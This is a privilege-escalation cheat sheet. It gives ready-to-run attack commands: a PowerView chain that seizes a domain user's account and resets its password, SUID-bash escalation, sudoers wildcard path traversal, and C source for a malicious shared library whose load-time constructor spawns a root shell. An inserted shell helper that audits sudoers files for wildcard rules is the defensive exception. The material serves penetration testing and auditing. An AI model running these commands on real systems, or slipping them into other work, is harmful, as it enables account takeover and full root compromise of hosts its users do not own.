Windows PrivEsc
Some of the Active Directory object permissions and rights that matter for privilege escalation (each one gives an attacker a path to take over the object, so each is worth auditing):
1. GenericAll – full rights to the object (e.g. add users to a group or reset a user's password)
2. GenericWrite – update the object's attributes (e.g. the logon script)
3. WriteOwner – change the object owner to an attacker-controlled user and so take over the object
4. WriteDACL – modify the object's ACEs and grant full control over the object
5. AllExtendedRights – ability to add a user to a group or reset a password
6. ForceChangePassword – ability to change a user's password without knowing the current one
7. Self (Self-Membership) – ability to add yourself to a group
>icacls [file/folder]
Check the DACL (Discretionary Access Control List) of a file or folder
>Set-DomainObjectOwner -identity claire -OwnerIdentity tom; Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword; $cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force; Set-DomainUserPassword -identity claire -accountpassword $cred
PowerView chain: with WriteOwner over claire, tom takes ownership, grants himself ResetPassword, then sets a new password
>net group backup_admins claire /add
Linux PrivEsc
>chmod u+s /bin/bash
>chmod 4755 /bin/bash
>bash -p
>./bash -p
Set the SUID bit on bash and escalate with the -p option (bash drops effective privileges unless -p is given)
>cp /bin/bash /bin/privesc
>chmod 6667 /bin/privesc
>/bin/privesc -p
Copy bash to another name and set SUID on the copy, then run it with -p
>sudo -l -l
....
Sudoers entry:
RunAsUsers: ALL
Commands:
/usr/bin/node /usr/tmp/*.js
The wildcard can be abused: the command "/usr/bin/node /usr/tmp/../../home/user/exploit.js" is permitted, since the wildcard matches anything, including a path traversal out of /usr/tmp.
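The defender's counterpart to the wildcard rule above is to audit sudoers for command specs containing glob characters. This is an added helper, not part of the original notes; the sudoers text it scans is a constructed sample, and the function names are my own.

```shell
#!/bin/sh
# Added audit helper (not from the original notes).
# Constructed sudoers-style sample, not taken from any real host.
SAMPLE_SUDOERS='# constructed sample
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin"
root    ALL=(ALL:ALL) ALL
user    ALL=(ALL) /usr/bin/node /usr/tmp/*.js
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app?
ops     ALL=(ALL) /usr/bin/less /var/log/syslog
%backup ALL=(ALL) /usr/local/bin/backup.sh *'

# Read sudoers text on stdin and print every user-spec line whose
# command part contains a glob character (*, ? or [). Such rules let
# the user pick arbitrary arguments, including "../" traversals.
find_wildcard_rules() {
    grep -v '^[[:space:]]*#' | grep -v '^[[:space:]]*$' | \
    grep -v '^[[:space:]]*Defaults' | \
    awk '{
        # Everything after the first "=" is the (runas) command spec.
        spec = substr($0, index($0, "=") + 1)
        # Drop the "(runas)" group so "(ALL:ALL)" is not mistaken for a glob.
        sub(/^[[:space:]]*\([^)]*\)[[:space:]]*/, "", spec)
        if (spec ~ /[*?]/ || index(spec, "[") > 0) print $0
    }'
}

# Number of wildcard rules in the constructed sample.
count_wildcard_rules() {
    printf '%s\n' "$SAMPLE_SUDOERS" | find_wildcard_rules | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_SUDOERS" | find_wildcard_rules
```

Each flagged rule should be rewritten with an exact command line, or moved behind a wrapper script that validates its own arguments.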
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <unistd.h>
#include <sys/types.h>

/* Constructor attribute: runs when the shared object is loaded, before main() */
void method(void) __attribute__((constructor));

void method(void) {
    system("/bin/bash -i");
}
>gcc -shared -fpic -o .config/libcounter.so PrivEsc.c
Compile the C code into a shared object; when an application executed by the superuser loads libcounter.so (e.g. from a writable library search path), the constructor runs as root